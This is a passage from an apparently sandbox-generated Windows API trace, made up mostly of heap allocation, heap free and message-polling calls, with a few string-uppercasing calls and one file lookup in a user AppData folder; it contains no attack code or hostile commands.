Flags=0x0, Size=0x10) returned 0x24a9fc0 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0206.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0206.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0206.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0206.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0206.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.214] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0206.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0206.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0206.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.215] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0206.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0206.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.215] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.216] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0206.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0206.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0206.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0206.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0206.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0206.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.217] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0206.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0206.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0206.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0206.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0206.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0206.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0206.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0206.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0206.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0206.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0206.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0206.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0206.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.220] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0206.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0206.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0206.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0206.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0206.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0206.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.221] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0206.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0206.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0206.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.222] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/qN0j1jGF7bK.jpg", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fc02520, ftCreationTime.dwHighDateTime=0x1d4d281, ftLastAccessTime.dwLowDateTime=0xbd7fbdf0, ftLastAccessTime.dwHighDateTime=0x1d4ce2e, ftLastWriteTime.dwLowDateTime=0xbd7fbdf0, ftLastWriteTime.dwHighDateTime=0x1d4ce2e, nFileSizeHigh=0x0, nFileSizeLow=0x17426, dwReserved0=0xa340039, dwReserved1=0x195a1, cFileName="qN0j1jGF7bK.jpg", cAlternateFileName="QN0J1J~1.JPG")) returned 0xaa5820 [0206.222] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0206.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.223] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0206.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0206.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0206.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.225] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.225] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.225] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.225] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.226] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.226] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.226] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.226] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.226] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.226] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | 